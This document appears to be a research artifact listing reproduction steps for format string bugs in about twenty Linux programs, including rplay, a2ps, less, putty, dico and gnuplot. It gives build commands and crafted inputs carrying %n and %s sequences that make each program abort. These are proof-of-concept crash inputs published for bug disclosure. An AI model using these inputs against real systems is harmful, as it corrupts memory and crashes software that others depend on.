Program inputs that trigger the format string bugs we found

Our test environment is 64-bit Ubuntu 16.04

List of packages we installed

  1. rplay-3.3.2/rptp
    $ sudo apt-get install rplay-server
    $ sudo service rplay start
    $ sudo apt-get remove libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rplay_3.3.2.orig.tar.gz
    $ tar xvzf rplay_3.3.2.orig.tar.gz
    $ cd rplay-3.3.2
    $ sed -i "s/static int inetd/int inetd/g" rplayd/rplayd.c
    $ sed -i "s/<sys\/types.h>/<sys\/types.h>\n#include <errno.h>/g" rplayd/rplayd.h
    $ ./configure && make CFLAGS=-D_GNU_SOURCE && sudo make install

    1.1
    $ rptp volume %n
    Aborted (core dump)

    1.2
    $ rptp
    rptp> volume %n
    Aborted (core dump)

    1.3
    // when rptp is built without the readline library
    $ rptp --prompt %n
    Aborted (core dump)

  2. rplay-3.3.2/rplay
    $ sudo apt-get install rplay-server
    $ sudo service rplay start
    $ sudo apt-get remove libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rplay_3.3.2.orig.tar.gz
    $ tar xvzf rplay_3.3.2.orig.tar.gz
    $ cd rplay-3.3.2
    $ sed -i "s/static int inetd/int inetd/g" rplayd/rplayd.c
    $ sed -i "s/<sys\/types.h>/<sys\/types.h>\n#include <errno.h>/g" rplayd/rplayd.h
    $ ./configure && make CFLAGS=-D_GNU_SOURCE && sudo make install

    2.1
    $ sudo apt-get install rplay-server
    $ rplay %n
    Aborted (core dump)

  3. a2ps-4.14

    $ sudo apt-get install gperf
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/a/a2ps/a2ps_4.14.orig.tar.gz
    $ tar xvzf a2ps_4.14.orig.tar.gz
    $ cd a2ps-4.14 && ./configure && make && sudo make install

    3.1
    $ cat /usr/local/share/a2ps/ps/exploit.pro

    % -- code follows this line --  
    %Expand: exploit\%n\%n\%n  
    %Face: Plain Courier bfs  
    %Face: Symbol Symbol bfs  
    %Face: Keyword Courier-Oblique bfs  
    %Face: Keyword_strong Courier-Bold bfs  
    %Face: Comment Courier-Oblique bfs  
    %Face: Comment_strong Courier-BoldOblique bfs  
    %Face: Label Helvetica bfs  
    %Face: Label_strong Helvetica-Bold bfs  
    %Face: String Times-Roman bfs  
    %Face: Error Helvetica-Bold bfs  
    

    $ a2ps --prologue=exploit
    Aborted (core dump)

    3.2
    $ cat /usr/local/share/a2ps/ps/exploit2.pro

    % -- code follows this line --  
    %%Expand: $(BUG)  
    %Face: Plain Courier bfs  
    %Face: Symbol Symbol bfs  
    %Face: Keyword Courier-Oblique bfs  
    %Face: Keyword_strong Courier-Bold bfs  
    %Face: Comment Courier-Oblique bfs  
    %Face: Comment_strong Courier-BoldOblique bfs  
    %Face: Label Helvetica bfs  
    %Face: Label_strong Helvetica-Bold bfs  
    %Face: String Times-Roman bfs  
    %Face: Error Helvetica-Bold bfs  
    

    $ export BUG=exploit%n%n%n
    $ a2ps --prologue=exploit
    Aborted (core dump)

  4. mp3rename-0.6

    4.1
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/mp3rename_0.6.orig.tar.gz
    $ tar xvzf mp3rename_0.6.orig.tar.gz
    $ cd mp3rename-0.6.orig/ && make
    $ ./mp3rename -s exploit%n%n%n%n
    Aborted (core dump)

  5. fpgatools-0.0+201212-1/sort_seq

    5.1
    $ sudo apt-get install libxml2-dev
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/f/fpgatools/fpgatools_0.0+201212.orig.tar.gz
    $ tar xvzf fpgatools_0.0+201212.orig.tar.gz
    $ cd fpgatools-201212 && make
    $ echo exploit%n%n%n > t
    $ ./sort_seq t
    Aborted (core dump)

  6. devio-1.2
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/devio_1.2.orig.tar.gz
    $ tar xvzf devio_1.2.orig.tar.gz
    $ cd devio-1.2/ && ./configure && make && sudo make install
    6.1
    $ devio pfexploit%n%n%n
    Aborted (core dump)

  7. uni2ascii-4.14
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/uni2ascii_4.14.orig.tar.gz
    $ tar xvzf uni2ascii_4.14.orig.tar.gz
    $ cd uni2ascii-4.14
    $ sed -i 's/endian.h/myendian.h/g' *
    $ mv endian.h myendian.h
    $ ./configure && make CFLAGS=-D_GNU_SOURCE && sudo make install
    7.1
    $ uni2ascii -n -Z exploit%n
    -- press enter --
    Aborted (core dump)

  8. shntool-3.0.10
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/shntool_3.0.10.orig.tar.gz
    $ tar xvzf shntool_3.0.10.orig.tar.gz
    $ cd shntool-3.0.10/ && ./configure && make && sudo make install
    8.1
    $ shntool split -n "%n" -f [CUE file] [WAV file]
    Aborted (core dump)

  9. less-481
    $ less --version
    less 481 (GNU regular expressions)

    9.1
    $ python -c 'print "\xAA" ' > exploit
    $ export LESSBINFMT=%s%s%s
    $ less exploit
    Aborted (core dump)
    9.2
    $ python -c 'print "\xEF\xBB\xBF\xD0\x81"' > exploit
    $ export LESSUTFBINFMT=%s%s%s
    $ less exploit
    Aborted (core dump)

  10. tiptop-2.2

    10.1
    $ sudo apt-get install libxml2-dev
    $ sudo apt-get install byacc flex
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/tiptop_2.2.orig.tar.gz
    $ ./configure && make && sudo make install
    $ cd ~/
    $ cat .tiptoprc

    <tiptop>
    <screen name="exploit" desc="Screen by default ">
    <column header="  Exploit!" format=" exploit%n%n%n" desc="CPU usage" expr="CPU_TOT" />
    </screen>
    </tiptop>
    

    $ tiptop -W . -i
    -- press the right arrow key twice --
    Aborted (core dump)

  11. ghostscript-8.71/genconf

    11.1
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/ghostscript_8.71.dfsg.2.orig.tar.gz
    $ tar xvzf ghostscript_8.71.dfsg.2.orig.tar.gz
    $ cd ghostscript-8.71.dfsg.2 && ./configure && make XCFLAGS=-DHAVE_SYS_TIME_H=1
    $ cd obj
    $ cat pgmraw.dev
    -dev2 pgmraw -include ./obj/page -obj ./obj/gdevpbm.o ./obj/gdevppla.o ./obj/gdevmpla.o
    $ ./genconf -n exploit%n%n%n pgmraw.dev

  12. pal-0.4.3
    $ sudo apt-get install libglib2.0-dev
    $ sudo apt-get install libncurses5-dev
    $ sudo apt-get install libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/pal_0.4.3.orig.tar.gz
    $ tar xvzf pal_0.4.3.orig.tar.gz
    $ cd pal-0.4.3/ && make && sudo make install

    12.1
    $ touch exploit%n%n%n
    $ pal -p exploit%n%n%n
    Aborted (core dump)

    12.2
    $ pwd
    /home/icse
    $ touch exploit%n%n%n
    $ pal -p /home/icse/exploit%n%n%n
    Aborted (core dump)

    12.3
    $ pwd
    /home/icse
    $ touch exploit%n%n%n
    $ cat exploit.pal
    file_hide /home/icse/exploit%n%n%n
    $ pal -f exploit.pal
    Aborted (core dump)

  13. latex2rtf-2.3.8
    $ sudo apt-get install texinfo
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/latex2rtf_2.3.8.orig.tar.gz
    $ tar xvzf latex2rtf_2.3.8.orig.tar.gz
    $ cd latex2rtf-2.3.8/ && make && sudo make install
    13.1
    $ cat exploit.tex

    \documentclass{article}  
    \begin{document}  
    \title{exploit}  
    \author{Jong-Gwon Kim}  
    \keywords{exploit\%n\%n\%n}  
    \end{document}  
    

    $ latex2rtf exploit.tex
    Aborted (core dump)

  14. putty-0.65
    $ sudo apt-get install libgtk2.0-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/putty_0.65.orig.tar.gz
    $ tar xvzf putty_0.65.orig.tar.gz
    $ cd putty-0.65 && ./configure && make && sudo make install
    14.1
    $ cd /tmp
    $ mkdir exploit%n%n%n
    $ mkdir exploit%n%n%n/.putty
    $ chmod 000 exploit%n%n%n/.putty
    $ export HOME=/tmp/exploit%n%n%n
    $ putty
    -- connect to some host via ssh --
    Aborted (core dump)

  15. daemon-0.6.4
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/daemon_0.6.4.orig.tar.gz
    $ tar xvzf daemon_0.6.4.orig.tar.gz
    $ cd daemon-0.6.4/ && ./configure && make && sudo make install
    15.1 argv
    $ ln -s /usr/local/bin/daemon exploit%n%n%n
    $ ./exploit%n%n%n test -r -L 999999999999999
    Aborted (core dump)

  16. dico-2.0
    $ sudo apt-get install byacc flex
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/dico_2.0.orig.tar.gz
    $ tar xvzf dico_2.0.orig.tar.gz
    $ cd dico-2.0 && ./configure && make && sudo make install
    16.1
    $ cd ~; mkdir exploit%n%n%n
    $ export HOME=~/exploit%n%n%n
    $ echo "a" > $HOME/.dico
    $ LD_LIBRARY_PATH=/usr/local/lib dico
    Aborted (core dump)

  17. dicod-2.0
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/dico_2.0.orig.tar.gz
    $ tar xvzf dico_2.0.orig.tar.gz
    $ cd dico-2.0 && ./configure && make && sudo make install
    17.1
    $ cat exploitfile%n%n%n
    abcdef
    $ LD_LIBRARY_PATH=/usr/local/lib dicod --config exploitfile%n%n%n
    Aborted (core dump)

    17.2 // different sink
    $ export DICTD_LOGGING=LOG
    $ cat exploitfile%n%n%n
    abcdef
    $ LD_LIBRARY_PATH=/usr/local/lib dicod --config exploitfile%n%n%n
    Aborted (core dump)

  18. rrdtool-1.4.8
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rrdtool_1.4.8.orig.tar.gz
    $ tar xvzf rrdtool_1.4.8.orig.tar.gz
    $ cd rrdtool-1.4.8 && LDFLAGS="-lglib-2.0" ./configure && make && sudo make install
    18.1
    $ /opt/rrdtool-1.4.8/bin/rrdtool graphv foo.svg -f exploit%n%n%n
    Aborted (core dump)

  19. gnuplot-4.2.6
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/gnuplot_4.2.6.orig.tar.gz
    $ tar xvzf gnuplot_4.2.6.orig.tar.gz
    $ cd gnuplot-4.2.6/ && ./configure && make && sudo make install

    19.1
    $ export GNUPLOT_TTFTOPFA=exploit%n%n%n
    $ touch my.ttf
    $ gnuplot
    gnuplot> set term postscript fontfile "my.ttf"

  20. sdop-0.61
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/sdop_0.61.orig.tar.gz
    $ tar xvzf sdop_0.61.orig.tar.gz
    $ cd sdop-0.61
    $ sed -i 's/sdop \$(SDOBJ)/sdop \$(SDOBJ) \$(LIBS)/g' src/Makefile
    $ ./configure && make && sudo make install

    20.1
    $ cat sink1

    <?sdop orderedlist_format="%n%n%n" ?>  
    <orderedlist>  
    <listitem>  
    <para>Exploit</para>  
    </listitem>  
    </orderedlist>  
    

    $ sdop sink1
    Aborted (core dump)

    20.2 // different src
    $ cat sink1

    <?sdop   
    orderedlist_format="%n%n%n" ?>  
    <orderedlist>  
    <listitem>  
    <para>Exploit</para>  
    </listitem>  
    </orderedlist>  
    

    $ sdop sink1
    Aborted (core dump)

    20.3
    $ cat sink2

    <?sdop example_number_format="[%n]" ?>  
    <example id="exploit">  
    <title>Exploit</title>  
    </example>  
    

    $ sdop sink2
    Aborted (core dump)

    20.4 // different src
    $ cat sink2

    <?sdop   
    example_number_format="[%n]" ?>  
    <example id="exploit">  
    <title>Exploit</title>  
    </example>  
    

    $ sdop sink2
    Aborted (core dump)